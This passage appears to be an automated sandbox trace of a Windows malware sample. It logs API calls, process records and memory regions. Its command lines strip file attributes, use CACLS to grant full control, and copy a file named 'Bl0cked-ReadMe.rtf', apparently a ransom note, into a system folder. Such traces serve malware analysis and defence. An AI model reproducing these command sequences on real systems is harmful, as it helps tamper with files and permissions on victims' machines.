\"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x14f4bc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, 
hStdError=0x0), lpProcessInformation=0x14f508 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png\"", lpProcessInformation=0x14f508*(hProcess=0x4c, hThread=0x50, dwProcessId=0xa14, dwThreadId=0x5fc)) returned 1 [0149.399] CloseHandle (hObject=0x50) returned 1 [0149.399] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0149.399] GetEnvironmentStringsW () returned 0x172480* [0149.399] FreeEnvironmentStringsW (penv=0x172480) returned 1 [0149.399] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0149.439] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x14f3fc | out: lpExitCode=0x14f3fc*=0x0) returned 1 [0149.439] CloseHandle (hObject=0x4c) returned 1 [0149.439] _vsnwprintf (in: _Buffer=0x14f544, _BufferCount=0x13, _Format="%08X", _ArgList=0x14f408 | out: _Buffer="00000000") returned 8 [0149.439] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0149.439] GetEnvironmentStringsW () returned 0x172480* [0149.439] FreeEnvironmentStringsW (penv=0x172480) returned 1 [0149.439] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0149.439] GetEnvironmentStringsW () returned 0x172480* [0149.439] FreeEnvironmentStringsW (penv=0x172480) returned 1 [0149.439] DeleteProcThreadAttributeList (in: lpAttributeList=0x14f460 | out: lpAttributeList=0x14f460) [0149.439] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.439] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0149.440] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.440] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0149.440] _get_osfhandle (_FileHandle=0) returned 0x3 [0149.440] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0149.440] SetConsoleInputExeNameW () returned 0x1 [0149.440] GetConsoleOutputCP () returned 0x1b5 
[0149.440] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0149.440] SetThreadUILanguage (LangId=0x0) returned 0x409 [0149.440] exit (_Code=0) Process: id = "228" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea167a0" os_pid = "0xca4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "227" os_parent_pid = "0xc10" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 19136 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 19137 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 19138 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 19139 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 19140 start_va = 0x910000 end_va = 0x918fff entry_point = 0x910000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 19141 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = 
"ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 19142 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 19143 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 19144 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 19145 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 19146 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 19147 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 19148 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 19149 start_va = 0x180000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 19150 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 19151 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 19152 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = 
"rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 19153 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 19154 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 19155 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 19156 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 19157 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 289 os_tid = 0xc24 Thread: id = 290 os_tid = 0xc90 Process: id = "229" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea167a0" os_pid = "0xa14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "227" os_parent_pid = "0xc10" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" 
[0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 19220 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 19221 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 19222 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 19223 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 19224 start_va = 0x7b0000 end_va = 0x7b6fff entry_point = 0x7b0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 19225 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 19226 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 19227 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 19228 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 19229 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 19230 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000010000" filename = "" Region: id = 19231 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 19232 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 19233 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 19234 start_va = 0x580000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 19235 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 19236 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 19237 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 19238 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 19239 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 19240 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = 
"\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 19241 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 19242 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 19243 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 19244 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 19245 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 19246 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 19247 start_va = 0x190000 end_va = 0x257fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 19248 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 19249 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 
291 os_tid = 0x5fc Process: id = "230" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ce0" os_pid = "0x46c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 19250 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 19251 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 19252 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 19253 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 19254 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 19255 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 19256 
start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 19257 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 19258 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 19259 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 19260 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 19261 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 19262 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 19263 start_va = 0x200000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 19264 start_va = 0x420000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 19265 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 19266 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 19267 
start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 19268 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 19269 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 19270 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 19271 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 19272 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 19273 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 19274 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 19275 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 19276 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = 
"msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 19277 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 19278 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 19279 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 19280 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 19281 start_va = 0x310000 end_va = 0x410fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 19282 start_va = 0x520000 end_va = 0x111ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 19283 start_va = 0x1120000 end_va = 0x1282fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Region: id = 19284 start_va = 0x1290000 end_va = 0x134ffff entry_point = 0x1290000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 292 os_tid = 0x8d4 [0149.488] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fbe4 | out: lpSystemTimeAsFileTime=0x30fbe4*(dwLowDateTime=0x9307ed80, dwHighDateTime=0x1d440a9)) [0149.488] GetCurrentProcessId () returned 0x46c [0149.488] GetCurrentThreadId () returned 0x8d4 [0149.488] GetTickCount () returned 0x2e4d2 [0149.488] QueryPerformanceCounter (in: lpPerformanceCount=0x30fbdc | out: lpPerformanceCount=0x30fbdc*=20627722898) returned 1 [0149.489] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0149.489] 
__set_app_type (_Type=0x1) [0149.489] __p__fmode () returned 0x76b331f4 [0149.489] __p__commode () returned 0x76b331fc [0149.489] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0149.489] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0149.489] GetCurrentThreadId () returned 0x8d4 [0149.489] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8d4) returned 0x38 [0149.489] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0149.489] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0149.489] SetThreadUILanguage (LangId=0x0) returned 0x409 [0149.489] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0149.489] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30fb74 | out: phkResult=0x30fb74*=0x0) returned 0x2 [0149.489] VirtualQuery (in: lpAddress=0x30fbab, lpBuffer=0x30fb44, dwLength=0x1c | out: lpBuffer=0x30fb44*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.490] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30fb44, dwLength=0x1c | out: lpBuffer=0x30fb44*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0149.490] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30fb44, dwLength=0x1c | out: lpBuffer=0x30fb44*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0149.490] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30fb44, dwLength=0x1c | out: 
lpBuffer=0x30fb44*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.490] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30fb44, dwLength=0x1c | out: lpBuffer=0x30fb44*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0149.490] GetConsoleOutputCP () returned 0x1b5 [0149.490] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0149.490] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0149.490] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.490] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0149.490] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.490] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0149.490] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.490] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0149.490] _get_osfhandle (_FileHandle=0) returned 0x3 [0149.490] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0149.491] _get_osfhandle (_FileHandle=0) returned 0x3 [0149.491] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0149.491] GetEnvironmentStringsW () returned 0x4301c8* [0149.491] FreeEnvironmentStringsW (penv=0x4301c8) returned 1 [0149.491] GetEnvironmentStringsW () returned 0x4301c8* [0149.491] FreeEnvironmentStringsW (penv=0x4301c8) returned 1 [0149.491] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30eae4 | out: phkResult=0x30eae4*=0x40) returned 0x0 [0149.491] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30eaec, lpData=0x30eaf0, lpcbData=0x30eae8*=0x1000 | out: lpType=0x30eaec*=0x0, lpData=0x30eaf0*=0x0, 
lpcbData=0x30eae8*=0x1000) returned 0x2 [0149.491] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30eaec, lpData=0x30eaf0, lpcbData=0x30eae8*=0x1000 | out: lpType=0x30eaec*=0x4, lpData=0x30eaf0*=0x1, lpcbData=0x30eae8*=0x4) returned 0x0 [0149.491] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30eaec, lpData=0x30eaf0, lpcbData=0x30eae8*=0x1000 | out: lpType=0x30eaec*=0x0, lpData=0x30eaf0*=0x1, lpcbData=0x30eae8*=0x1000) returned 0x2 [0149.491] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30eaec, lpData=0x30eaf0, lpcbData=0x30eae8*=0x1000 | out: lpType=0x30eaec*=0x4, lpData=0x30eaf0*=0x0, lpcbData=0x30eae8*=0x4) returned 0x0 [0149.491] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30eaec, lpData=0x30eaf0, lpcbData=0x30eae8*=0x1000 | out: lpType=0x30eaec*=0x4, lpData=0x30eaf0*=0x40, lpcbData=0x30eae8*=0x4) returned 0x0 [0149.491] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30eaec, lpData=0x30eaf0, lpcbData=0x30eae8*=0x1000 | out: lpType=0x30eaec*=0x4, lpData=0x30eaf0*=0x40, lpcbData=0x30eae8*=0x4) returned 0x0 [0149.491] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30eaec, lpData=0x30eaf0, lpcbData=0x30eae8*=0x1000 | out: lpType=0x30eaec*=0x0, lpData=0x30eaf0*=0x40, lpcbData=0x30eae8*=0x1000) returned 0x2 [0149.491] RegCloseKey (hKey=0x40) returned 0x0 [0149.491] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, 